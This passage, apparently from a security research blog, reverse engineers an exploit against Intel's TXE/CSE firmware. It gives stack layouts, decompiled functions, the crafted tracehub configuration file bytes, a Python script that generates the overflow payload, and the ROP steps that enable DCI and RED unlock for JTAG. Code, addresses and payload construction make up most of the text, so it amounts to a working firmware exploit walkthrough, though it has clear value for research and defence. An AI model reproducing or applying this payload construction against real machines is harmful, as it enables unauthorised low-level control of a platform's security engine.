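    """Toy model of the last 4 KiB below the top of the stack."""
    SIZE = 0x1000

    def __init__(self):
        self.base = STACK_TOP - self.SIZE
        self.mem = bytearray(self.SIZE)

    def write(self, addr, payload):
        start = addr - self.base
        self.mem[start:start + len(payload)] = payload

    def read_dword(self, addr):
        return struct.unpack_from("<L", self.mem, addr - self.base)[0]

def bup_dfs_read_file(stack, buffer_addr, file_content):
    # The shared memory block points at the destination buffer, but its size
    # comes from the file (read_size), not from the 808 byte array.
    block = {"addr": buffer_addr, "size": len(file_content)}
    # sys_write_shared_memory boils down to a single memcpy to block["addr"]
    stack.write(block["addr"], file_content[:block["size"]])

stack = Stack()
cookie_addr = CT_DATA_ADDR + CT_BUFFER_SIZE
stack.write(cookie_addr, struct.pack("<L", COOKIE))

# A 0x380 byte file is read "in one shot", straight onto the stack
bup_dfs_read_file(stack, CT_DATA_ADDR, b"A" * 0x380)
print("cookie slot 0x%05X now holds 0x%08X" % (cookie_addr, stack.read_dword(cookie_addr)))
```

There is no second write in this model: by the time the read function returns, the cookie and everything above it up to the top of the stack are already gone.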

So, technically, according to the BlackHat presentation, when bup_read_mfs_file gets called, it reads the MFS file in chunks, and when it calls sys_write_shared_memory, it will execute our exploit. From the stack that I dumped and analyzed above, that’s not what happens: the stack is corrupted (overwritten by subsequent calls), which proves that bup_read_mfs_file has returned before the exploit happens. Reverse engineering the code also shows that there is no reading in chunks, which explains why things are different than in the presentation. So the exploit has to happen between the call to bup_dfs_read_file and the end of bup_init_trace_hub, because the security cookie (stack guard) is destroyed by the buffer overflow, so we can’t let bup_init_trace_hub return. If we look at what happens in bup_init_trace_hub after the call to bup_dfs_read_file, then we see this :

    void bup_init_trace_hub() {
        char ct_data[808];
        int file_size;
        int bytes_read;

        // again, simplification
        bup_dfs_get_file_size("/home/bup/ct", &file_size);
        bup_dfs_read_file("/home/bup/ct", 0, ct_data, file_size, &bytes_read);

        CT *ct = (CT *)ct_data;
        for (uint16_t i = 0; i < ct->num_entries; i++) {
            if (ct->entries[i].segment_selector == 1)
                set_segment_word(7, ct->entries[i].offset, ct->entries[i].value);
            if (ct->entries[i].segment_selector == 2)
                set_segment_word(0xBF, ct->entries[i].offset, ct->entries[i].value);
        }
        bup_init_trace_hub_set_systracer(7, 0xBF);
    }

    // sub_49AD3
    // The following is a small function that gets called and sets flags on
    // the systracer context value and returns.
    void bup_init_trace_hub_set_systracer(unsigned int seg1, unsigned int seg2) {
        // sys_get_sys_tracer_ctx() returns syslib_context + 0x200
        char *systracer = sys_get_sys_tracer_ctx();

        // Set the DWORD at address systracer + 0x10 to the first argument
        *(uint32_t *)(systracer + 0x10) = seg1;

        // Set bits 0 and 1 of systracer to 1 and clear bits 6 and 7
        systracer[0] |= 3;
        systracer[0] &= 0x3F;
        // set bit 6 of systracer to the same as bit 3 of 0xBF:10
        systracer[0] |= ((get_segment_word(seg2, 0x10) >> 3) & 1) << 6;
        // set bit 7 of systracer to the same as bit 7 of 0xBF:10
        systracer[0] |= get_segment_word(seg2, 0x10) & 0x80;

        // Clear bits 8 and 9 of systracer
        systracer[1] &= 0xFC;
        // set bit 8 of systracer to the same as bit 11 of 0xBF:10
        systracer[1] |= (get_segment_word(seg2, 0x10) >> 11) & 1;
        // set bit 9 of systracer to the same as bit 24 of 0xBF:E0
        systracer[1] |= ((get_segment_word(seg2, 0xE0) >> 24) & 1) << 1;
    }

The systracer context is at syslib_ctx + 0x200, and if we look again at what the exploit from PT does, it sets the syslib_ctx to 0x55a58, so the modified data (systracer) is at 0x55c58, which happens to be where the return address of the function bup_init_trace_hub_set_systracer itself is stored. Here’s what the stack actually looks like if we follow all the push/pop/call/ret from the entrypoint to the moment the exploit happens :

TXE STACK - bup_entry:
0x56000: STACK TOP
0x55FEC: TLS
0x55FE8: ecx - arg to bup_main
0x55FE4: edx - arg
0x55FE0: eax - arg
0x55FDC: retaddr - call bup_main
0x55FD8: saved ebp of bup_entry
0x55FD4: 0 - arg to bup_run_init_scripts
0x55FD0: retaddr - call bup_run_init_scripts
0x55FCC: saved ebp of bup_main
0x55FC8: saved edi
0x55FC4: saved esi
0x55FC0: saved ebx
0x55FBC: var_10
0x55FB8: retaddr - call bup_init_trace_hub
0x55FB4: saved ebp of bup_run_init_scripts
0x55FB0: saved esi
0x55FAC: saved ebx
0x55C64: STACK esp-0x348
0x55FA8: security cookie
0x55C80: ct_data
0x55C6C: si_features
0x55C68: file_size
0x55C64: bytes_read
0x55C60: 0xBF - arg to bup_init_trace_hub_set_systracer
0x55C5C: 7 - arg
0x55C58: retaddr - call bup_init_trace_hub_set_systracer
0x55C54: saved ebp of bup_init_trace_hub

So you can see that the systracer value that gets modified is at 0x55c58, which according to the stack holds the return address of bup_init_trace_hub_set_systracer. If we look at the dump of the stack from before, you can also see that the value at 0x55c68 is indeed 7 as expected (due to *(uint32_t *)(systracer + 0x10) = seg1; ). If we can control the return address of our own function, then we control what we execute.

The only parts of our return address that can be controlled, though, are bits 0, 1, 6, 7, 8 and 9. Bits 0 and 1 are always set to 1, bits 6, 7 and 8 depend on a value stored in segment 0xBF at offset 0x10, and bit 9 depends on a value stored in segment 0xBF at offset 0xE0. Thankfully both those values in segment 0xBF can be set through the tracehub configuration file header (the loop at the end of bup_init_trace_hub ).
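To get a feel for how little room that leaves, here is a small Python sketch that enumerates every address the return address could be turned into. It is only a model of the bit rules described above, not code from the exploit: the names FORCED_ONE, SELECTABLE and reachable_targets are made up for illustration, and 0x4995B is the original return address mentioned further down in this post.

```python
# Hypothetical model of the constraint described above (not from the exploit).
FORCED_ONE = 0b11          # bits 0 and 1 always end up set to 1
SELECTABLE = 0b1111 << 6   # bits 6, 7, 8 and 9 are copied from segment 0xBF


def reachable_targets(ret_addr):
    """Return every address the overwritten return address could become."""
    base = (ret_addr | FORCED_ONE) & ~SELECTABLE
    # 4 selectable bits give 16 combinations, spaced 0x40 bytes apart.
    return [base | (k << 6) for k in range(16)]


targets = reachable_targets(0x4995B)
for target in targets:
    print(hex(target))
```

So there are only 16 candidate landing spots, all within the same 1 KB window of code, and the exploit has to find one among them that is harmless to jump into.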

The ct file header has this format :

struct {
    uint8_t ignore[6];
    uint16_t num_entries;
    struct {
        uint24_t offset;           // offset in the segment is only 20 bits
        uint8_t segment_selector;  // if value is 1, segment is 0x07, if value is 2, segment is 0xBF
        uint32_t value;            // Value to set in segment_selector:offset
    }[num_entries];
};

With the ct file header being set by the exploit to :

00 00 00 00 00 00 02 00 e0 00 00 02 00 00 00 5f 10 00 00 02 88 08 00 00 00 00 00 00 00 00 00 00

We can see it has 2 entries, which set 0xBF:E0 to 0x5F000000 and 0xBF:10 to 0x00000888.
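If you want to check that reading of the bytes yourself, here is a minimal Python sketch that decodes the header according to the struct above. The variable names and the selector-to-segment dictionary are my own illustration. Only the byte values and the field layout come from the exploit.

```python
import struct

# First 24 bytes of the ct file header shown above (the trailing zeros are padding).
header = bytes.fromhex(
    "00 00 00 00 00 00 02 00"
    "e0 00 00 02 00 00 00 5f"
    "10 00 00 02 88 08 00 00"
)

# Selector 1 maps to segment 0x07, selector 2 maps to segment 0xBF.
SEGMENTS = {1: 0x07, 2: 0xBF}

num_entries = struct.unpack_from("<H", header, 6)[0]
entries = []
for i in range(num_entries):
    word, value = struct.unpack_from("<LL", header, 8 + 8 * i)
    offset = word & 0xFFFFFF   # low 24 bits: offset in the segment
    selector = word >> 24      # high byte: segment selector
    entries.append((SEGMENTS[selector], offset, value))

for segment, offset, value in entries:
    print("0x%02X:%X = 0x%08X" % (segment, offset, value))
```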

With those values set, the bup_init_trace_hub_set_systracer function that gets called in bup_init_trace_hub will overwrite its own return address, stored at 0x55C58, from 0x4995B to 0x49BDB. This makes it jump into the middle of sub_49BB6 with the stack/ebp of bup_init_trace_hub , such that when that function returns, it returns to the address stored in the retaddr slot of bup_init_trace_hub , which is at 0x55FB8. Note that the function sub_49BB6 does not check the stack for the security cookie, and the point where we jump into that function makes it call a few functions that just return with an error because their parameters are wrong, so it doesn’t seem to do anything.
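Here is a minimal Python model of that overwrite, which replays the byte operations of bup_init_trace_hub_set_systracer on the stored return address. The function name patch_return_address is hypothetical. The operations mirror the decompiled C above, and the inputs are the two values the ct header writes into segment 0xBF.

```python
def patch_return_address(ret_addr, bf_10, bf_e0):
    """Apply the systracer flag updates to a 32-bit little-endian value."""
    ctx = bytearray(ret_addr.to_bytes(4, "little"))

    ctx[0] |= 3                          # set bits 0 and 1
    ctx[0] &= 0x3F                       # clear bits 6 and 7
    ctx[0] |= ((bf_10 >> 3) & 1) << 6    # bit 6 <- bit 3 of 0xBF:10
    ctx[0] |= bf_10 & 0x80               # bit 7 <- bit 7 of 0xBF:10

    ctx[1] &= 0xFC                       # clear bits 8 and 9
    ctx[1] |= (bf_10 >> 11) & 1          # bit 8 <- bit 11 of 0xBF:10
    ctx[1] |= ((bf_e0 >> 24) & 1) << 1   # bit 9 <- bit 24 of 0xBF:E0

    return int.from_bytes(ctx, "little")


patched = patch_return_address(0x4995B, bf_10=0x00000888, bf_e0=0x5F000000)
print(hex(patched))
```

With 0x888 in 0xBF:10, bits 3, 7 and 11 are all set, and 0x5F000000 in 0xBF:E0 has bit 24 set, so all four selectable bits of the return address end up at 1.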

That address 0x55FB8, which contains the retaddr, corresponds to offset 0x338 in the ct file (0x56000 – 0x55FB8 = 0x48 bytes from the end of the file of size 0x380), which contains :

1a 6e 01 00 98 5c 05 00

The address 0x16e1a is in the middle of an actual instruction, but the bytes starting there decode as the instruction pop esp followed by a ret . This pops the next value, 0x55c98, into the stack pointer and returns to whatever address is stored there. If you remember, I said the ct buffer is saved at 0x55C80 (which you can also see from the stack analysis above), so address 0x55C98 is at offset 0x18 in the CT file (right after the header and those 2 entries that set values in segment 0xBF). That is where we find the actual ROP gadgets, which enable DCI, set red unlock, then enter an infinite loop.
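The address arithmetic in the last few paragraphs is easy to get wrong by hand, so here is a small Python sketch that redoes it. The variable names are mine. The constants are the ones quoted above (stack top 0x56000, ct file size 0x380, retaddr slot 0x55FB8).

```python
import struct

STACK_TOP = 0x56000
CT_SIZE = 0x380
RETADDR_SLOT = 0x55FB8   # where bup_init_trace_hub's return address lives

# The ct buffer occupies the last 0x380 bytes below the stack top.
ct_base = STACK_TOP - CT_SIZE

# The 8 bytes found at the retaddr slot: a gadget address and a new ESP.
small_rop = bytes.fromhex("1a 6e 01 00 98 5c 05 00")
gadget, new_esp = struct.unpack("<LL", small_rop)

slot_offset = RETADDR_SLOT - ct_base   # offset of the small ROP in the ct file
rop_offset = new_esp - ct_base         # offset of the big ROP chain in the ct file

print("ct buffer at", hex(ct_base))
print("small ROP at file offset", hex(slot_offset))
print("pop esp; ret gadget at", hex(gadget), "-> new esp", hex(new_esp))
print("big ROPs at file offset", hex(rop_offset))
```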

If we look back at the python script that generates the CT file for the exploit, we can now understand everything it does :

import struct

STACK_BASE = 0x00056000
BUFFER_OFFSET = 0x380
SYS_TRACER_CTX_OFFSET = 0x200
SYS_TRACER_CTX_REQ_OFFSET = 0x55c58
RET_ADDR_OFFSET = 0x338

def GenerateTHConfig():
    print("[*] Generating fake tracehub configuration...")
    # 6 ignored bytes, then the number of entries
    trace_hub_config = struct.pack("<B", 0x0)*6
    trace_hub_config += struct.pack("<H", 0x2)
    # Entry 1: 0xBF:E0 = 0x5f000000
    trace_hub_config += struct.pack("<L", 0x020000e0)
    trace_hub_config += struct.pack("<L", 0x5f000000)
    # Entry 2: 0xBF:10 = 0x00000888
    trace_hub_config += struct.pack("<L", 0x02000010)
    trace_hub_config += struct.pack("<L", 0x00000888)
    return trace_hub_config

def GenerateRops():
    print("[*] Generating rops...")
    # Let's ignore this for now
    return b""  # placeholder so this simplified version still runs

def GenerateShellCode():
    syslib_ctx_start = SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET
    data = GenerateTHConfig()
    init_trace_len = len(data)
    data += GenerateRops()
    # Pad up to the retaddr slot, then write the pop esp; ret gadget and the new esp
    data += struct.pack("<B", 0x0)*(RET_ADDR_OFFSET - len(data))
    data += struct.pack("<L", 0x00016e1a)
    data += struct.pack("<L", STACK_BASE - BUFFER_OFFSET + init_trace_len)
    # The fake TLS structure goes at the very end of the buffer
    data_tail = struct.pack("<LLLLL", 0, syslib_ctx_start, 0, 0x03000300, STACK_BASE-4)
    data += struct.pack("<B", 0x0)*(BUFFER_OFFSET - len(data) - len(data_tail))
    data += data_tail
    return data

The only remaining magic number is in that data_tail variable, which is the TLS structure. The 0x03000300 value is simply the thread ID.
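As a quick sanity check on that tail, here is a minimal Python sketch showing where it lands in memory and where it points the syslib context. The variable names are my own. The packing itself is copied from the script above, and I only interpret the two fields explained in this post (the syslib context pointer and the thread ID).

```python
import struct

STACK_BASE = 0x56000
SYS_TRACER_CTX_OFFSET = 0x200
SYS_TRACER_CTX_REQ_OFFSET = 0x55C58   # address of the retaddr we want to corrupt

syslib_ctx_start = SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET
data_tail = struct.pack("<LLLLL", 0, syslib_ctx_start, 0, 0x03000300, STACK_BASE - 4)

# The tail is the last thing in the buffer, so it ends exactly at the stack top.
tls_address = STACK_BASE - len(data_tail)

fields = struct.unpack("<LLLLL", data_tail)
syslib_ctx = fields[1]
thread_id = fields[3]
systracer_ctx = syslib_ctx + SYS_TRACER_CTX_OFFSET

print("TLS at", hex(tls_address))
print("syslib_ctx =", hex(syslib_ctx), "-> systracer ctx at", hex(systracer_ctx))
print("thread id =", hex(thread_id))
```

The TLS address matches the 0x55FEC entry in the stack listing above, and the systracer context ends up exactly on the return address slot.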

Rops

The latest version of the exploit, which adds CPU bring-up, simply adds the ROP gadgets needed to continue the bup initialization just as it would have right after bup_init_trace_hub returned (by resetting the syslib context to the right value, then restoring the stack and registers, then returning into bup_run_init_scripts ).

The ROPs are quite simple, they do two things : First, they enable the DCI interface, then they set the DfX Aggregator personality to 3 (which enables RED Unlock for JTAG), then they enter an infinite loop.

// Enable DCI
side_band_mapping(0x706a8, 0x100);
put_sel_word(0x19F, 0, 0x1010);     // Sets 0x19F:0 to 0x1010

// Set DfX-agg personality
side_band_mapping(0x70684, 0x100);
put_sel_word(0x19F, 0x8400, 3);     // Sets 0x19F:8400 to 3

loop();

I wondered for a long time “what is that sideband mapping” and “what are those 0x706a8 and 0x70684 values”. I will explain these in the next blog post (in the next couple of days) but in summary, it causes segment 0x19F to be mapped to the DCI and DfX Aggregator devices’ Private Configuration Registers (PCRs). So first, you map segment 0x19F to the DCI device’s PCR, then you enable DCI by setting the flags to 1, then you map segment 0x19F to the DfX-agg device then set the personality register in its PCR at offset 0x8400 to 3 (red).

With just those two values set, you have DCI enabled and Red Unlock enabled, and the exploit is working. Congratulations, you can now play around with your CSE device via JTAG.

Conclusion

The CT file has 4 things :

Header: which sets the various values in segment 0xBF for the systracer to work

Big ROPs: which execute the custom code we want to enable DCI and RED unlock

Small ROPs: Smaller header at offset 0x338 which does a pop esp; ret to return us to the first bigger ROP

TLS: The modified TLS header which points the syslib context to 0x55A58 so the systracer offset points to the return address of the function that sets it.

The new TLS has a new syslib context which points the systracer offset to the return address of the bup_init_trace_hub_set_systracer function. That function then modifies its own return address, using the values in the ct file header, in order to jump to offset 0x49BDB in sub_49BB6. When that function returns, it jumps to the small ROP, which replaces ESP with the address of the Big ROPs and then executes them. Those enable DCI and JTAG, then either loop forever or continue the bup init process, depending on the version of the exploit used.

Yeah.. that was a lot of fun to figure out. So you see that this exploit is not entirely the same as the Skylake exploit. The Skylake exploit is actually quite a lot more difficult to achieve because it involves more moving parts. I assume that’s the reason why PT hadn’t released that.

In the next post I write, I will explain how I ported this exploit to ME 11.x using the information provided by Positive Technologies, and I will explain how to port it to your own ME version using what I wrote as a base.

Thanks for reading!